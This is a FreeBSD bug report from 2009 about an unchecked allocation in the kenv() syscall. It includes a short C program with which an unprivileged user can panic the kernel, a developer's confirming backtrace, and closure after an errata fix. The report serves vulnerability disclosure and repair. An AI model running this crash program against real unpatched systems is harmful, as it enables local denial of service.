From nobody@FreeBSD.org  Sun Jan 11 21:23:37 2009
Return-Path: <nobody@FreeBSD.org>
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id 379561065676
	for <freebsd-gnats-submit@FreeBSD.org>; Sun, 11 Jan 2009 21:23:37 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21])
	by mx1.freebsd.org (Postfix) with ESMTP id 0BA058FC08
	for <freebsd-gnats-submit@FreeBSD.org>; Sun, 11 Jan 2009 21:23:37 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from www.freebsd.org (localhost [127.0.0.1])
	by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n0BLNaw8018755
	for <freebsd-gnats-submit@FreeBSD.org>; Sun, 11 Jan 2009 21:23:36 GMT
	(envelope-from nobody@www.freebsd.org)
Received: (from nobody@localhost)
	by www.freebsd.org (8.14.3/8.14.3/Submit) id n0BLNano018753;
	Sun, 11 Jan 2009 21:23:36 GMT
	(envelope-from nobody)
Message-Id: <200901112123.n0BLNano018753@www.freebsd.org>
Date: Sun, 11 Jan 2009 21:23:36 GMT
From: Nikolaos Rangos <nikolaos.rangos@googlemail.com>
To: freebsd-gnats-submit@FreeBSD.org
Subject: Normal users can crash 7.0-RELEASE through "kenv" syscall
X-Send-Pr-Version: www-3.1
X-GNATS-Notify:

>Number:         130391
>Category:       kern
>Synopsis:       [kenv] Normal users can crash 7.0-RELEASE through "kenv" syscall
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Sun Jan 11 21:30:02 UTC 2009
>Closed-Date:    Mon Mar 30 11:08:02 UTC 2009
>Last-Modified:  Mon Mar 30 11:08:02 UTC 2009
>Originator:     Nikolaos Rangos
>Release:        FreeBSD 7.0 RELEASE
>Organization:
>Environment:
FreeBSD localhost.Belkin 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

80 megs of RAM :) in a VM
>Description:
While digging for kernel bugs in FreeBSD 7.0-RELEASE I found the following:

There is an unchecked call to malloc() in the kenv() syscall.
Any value greater zero may be passed from user space to malloc().

Code snippet taken from sys/kern/kern_environment.c (FreeBSD 7.0):

 80 kenv(td, uap)
 81         struct thread *td;
 82         struct kenv_args /* {
 83                 int what;
 84                 const char *name;
 85                 char *value;
 86                 int len;
 87         } */ *uap;
 88 {
 89         char *name, *value, *buffer = NULL;
 90         size_t len, done, needed;
 91         int error, i;
 92 
 93         KASSERT(dynamic_kenv, ("kenv: dynamic_kenv = 0"));
 94 
 95         error = 0;
 96         if (uap->what == KENV_DUMP) {
 97 #ifdef MAC
 98                 error = mac_check_kenv_dump(td->td_ucred);
 99                 if (error)
100                         return (error);
101 #endif
102                 done = needed = 0;
103                 if (uap->len > 0 && uap->value != NULL) 
104 [1]                     buffer = malloc(uap->len, M_TEMP, M_WAITOK|M_ZERO);
105                 mtx_lock(&kenv_lock);

At line 104 uap->len is taken as an argument to malloc() without a size check what makes normal local users able to crash the kernel because of a large memory allocation. The len argument is in this case an int so the greatest value that can be taken by a normal user is 0x7fffffff.

FreeBSD 6.4 and MAYBE previous versions of FreeBSD do NOT contain this bug as there is no such call to malloc().

>How-To-Repeat:
Use this small testing program:

#include <stdio.h>
#include <kenv.h>

main() {
        char env[100];
        kenv(KENV_DUMP, NULL, env, 0x7fffffff);
}

>Fix:


>Release-Note:
>Audit-Trail:

From: Gavin Atkinson <gavini@FreeBSD.org>
To: bug-followup@FreeBSD.org
Cc: scottl@FreeBSD.org
Subject: Re: kern/130391: Normal users can crash 7.0-RELEASE through "kenv"
 syscall
Date: Sun, 11 Jan 2009 23:15:03 +0000 (GMT)

 I can confirm that this bug still exists on HEAD (sparc64):
 FreeBSD 8.0-20081215-SNAP (GENERIC) #0: Mon Dec 15 15:58:11 UTC 2008
 
 > cc 130391.c
 > ./a.out
 
 panic: kmem_malloc(-2147483648): kmem_map too small: 3497984 total allocated
 cpuid = 0
 KDB: enter: panic
 [thread pid 1124 tid 100065 ]
 Stopped at      kdb_enter+0x80: ta              %xcc, 1
 db> bt
 Tracing pid 1124 tid 100065 td 0xfffff80001b0b880
 panic() at panic+0x20c
 kmem_malloc() at kmem_malloc+0x2d8
 page_alloc() at page_alloc+0x28
 uma_large_malloc() at uma_large_malloc+0x44
 malloc() at malloc+0x1b0
 kenv() at kenv+0x88
 syscall() at syscall+0x2f0
 -- syscall (390, FreeBSD ELF64, kenv) %o7=0x10067c --
 userland() at 0x40454768
 user trace: trap %o7=0x10067c
 pc 0x40454768, sp 0x7fdffffe211
 pc 0x100550, sp 0x7fdffffe341
 pc 0x402066f4, sp 0x7fdffffe401
 done
 db>
 
 The changes that introduced this seem to be sys/kern/kern_environment.c 
 1.44 (by scottl@, cc'd)
 
 Gavin
State-Changed-From-To: open->closed 
State-Changed-By: gavin 
State-Changed-When: Mon Mar 30 11:03:39 UTC 2009 
State-Changed-Why:  
Thanks for reporting this, it has been fixed with the issue of FreeBSD 
Errata Notice FreeBSD-EN-09:01.kenv and has been fixed in 7.0 and 7.1 
as well as the 7-STABLE branch. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=130391 
>Unformatted:
